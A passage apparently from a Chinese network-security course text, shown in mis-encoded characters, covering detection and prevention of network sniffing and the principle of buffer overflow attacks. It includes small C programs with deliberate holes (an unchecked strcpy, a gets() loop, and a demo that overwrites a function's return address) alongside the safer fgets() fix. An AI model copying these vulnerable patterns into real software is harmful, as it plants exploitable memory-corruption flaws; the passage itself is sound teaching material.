以太網(wǎng)（Ethernet）協(xié)議的工作方式是將要發(fā)送的數(shù)據(jù)包發(fā)往連接在一起的所有主機(jī)，只有與數(shù)據(jù)包中目的地址一致的那臺(tái)主機(jī)才能接收到信息包。 當(dāng)主機(jī)工作在監(jiān)聽模式下時(shí)，無(wú)論數(shù)據(jù)包中的目標(biāo)地址是什么，主機(jī)都將接收，這就是實(shí)現(xiàn)網(wǎng)絡(luò)監(jiān)聽的基礎(chǔ)。5.4.2網(wǎng)絡(luò)監(jiān)聽檢測(cè)與防范1．網(wǎng)絡(luò)監(jiān)聽檢測(cè)(1)反應(yīng)時(shí)間

(2)觀測(cè)DNS(3)ping模式進(jìn)行監(jiān)測(cè)(4)arp數(shù)據(jù)包進(jìn)行監(jiān)測(cè)2．網(wǎng)絡(luò)監(jiān)聽的防范（1）采用加密手段進(jìn)行信息傳輸也是一個(gè)很好的辦法（2）以交換式集線器代替共享式集線器。交換式集線器代替共享式集線器，使單播包僅在兩個(gè)節(jié)點(diǎn)之間傳送，從而防止非法監(jiān)聽。（3）使用Kerberos。

5.5緩沖區(qū)溢出攻擊5.5.1緩沖區(qū)溢出原理

緩沖區(qū)是內(nèi)存中存放計(jì)算機(jī)正在處理數(shù)據(jù)的地方。當(dāng)數(shù)據(jù)量超出緩沖區(qū)的長(zhǎng)度時(shí)，多出來的數(shù)據(jù)就會(huì)破壞堆棧中的數(shù)據(jù)，導(dǎo)致應(yīng)用程序或整個(gè)系統(tǒng)的崩潰等故障；攻擊者在溢出數(shù)據(jù)中精心設(shè)計(jì)代碼，當(dāng)這些代碼溢出到緩沖區(qū)以外時(shí)會(huì)被執(zhí)行，能達(dá)到破壞計(jì)算機(jī)系統(tǒng)目的，即緩沖區(qū)溢出攻擊。

緩沖區(qū)溢出

1．通過往程序的緩沖區(qū)寫超出其長(zhǎng)度的內(nèi)容，造成緩沖區(qū)的溢出。例：

#include<string.h>voidmain(intargc,char*argv[]){charbuffer[10];strcpy(buffer,argv[1]);}

執(zhí)行該程序，輸入字符串長(zhǎng)度小于10時(shí)，程序正常運(yùn)行，否則系統(tǒng)崩潰。2．通過向程序的緩沖區(qū)寫超出其長(zhǎng)度的內(nèi)容，造成緩沖區(qū)的溢出，從而破壞程序的堆棧，使程序轉(zhuǎn)而執(zhí)行其它指令，以達(dá)到攻擊目的。例如下面程序：#include<iostream.h>#include<string.h>voidfunction(inta){ charbuffer[5]; char*ret; ret=buffer+12; *ret+=8;}voidmain(){ intx; x=10; function(7); x=1; cout<<x<<endl;}程序的運(yùn)行結(jié)果是？

程序的實(shí)際運(yùn)行結(jié)果是10，而不是1。

上段程序的執(zhí)行過程：依次為形式參數(shù)a、RET、EBP分配4字節(jié)的內(nèi)存，為語(yǔ)句charbuffer[5]分配內(nèi)存時(shí)，需要5字節(jié)的內(nèi)存。對(duì)于32位存儲(chǔ)器，內(nèi)存的分配是以4個(gè)字節(jié)為單位來進(jìn)行的，所以為buffer分配的內(nèi)存一共需要8個(gè)字節(jié)。voidmain(){ intx; x=10; function(7); x=1; cout<<x<<endl;}為參數(shù)賦值返回地址壓棧執(zhí)行被調(diào)用函數(shù)調(diào)用結(jié)束后返回返回處

執(zhí)行ret=buffer+12后，ret指向RET(buffer地址和RET地址相差12個(gè)字節(jié))。

RET的值是函數(shù)function(7)的返回地址，即“x=1”的首地址，執(zhí)行*ret+=8語(yǔ)句后就將RET的值加上了8個(gè)字節(jié)，而x=1這條語(yǔ)句占有8個(gè)字節(jié)。5.5.2緩沖區(qū)溢出攻擊方法1．在程序的地址空間里安排適當(dāng)?shù)拇a（1）植入法。（2）利用已經(jīng)存在的代碼。

2．控制程序轉(zhuǎn)移到攻擊代碼

（1）激活記錄。（2）函數(shù)指針。（3）長(zhǎng)跳轉(zhuǎn)緩沖區(qū)。5.5.3防范緩沖區(qū)溢出1．編寫正確的代碼編寫安全代碼是防止緩沖區(qū)溢出的最有效辦法：

charstr[10]…while（gets（str）!=NULL）

{puts（str）;memset（str,0,sizeof（str））;}

由于沒有嚴(yán)格規(guī)定輸入到str中的字符長(zhǎng)度，很容易產(chǎn)生緩沖區(qū)溢出漏洞。

正確的方式是使用fgets（chars,intsize,FILE*stream）。

charstr[10]…while（fgets(str,sizeof(str),stdin)!=NULL）

{puts（str）;memset（str,0,sizeof（str））;}2.及時(shí)安裝漏洞補(bǔ)丁3.借助防火墻阻止緩沖區(qū)溢出。5.5.3防范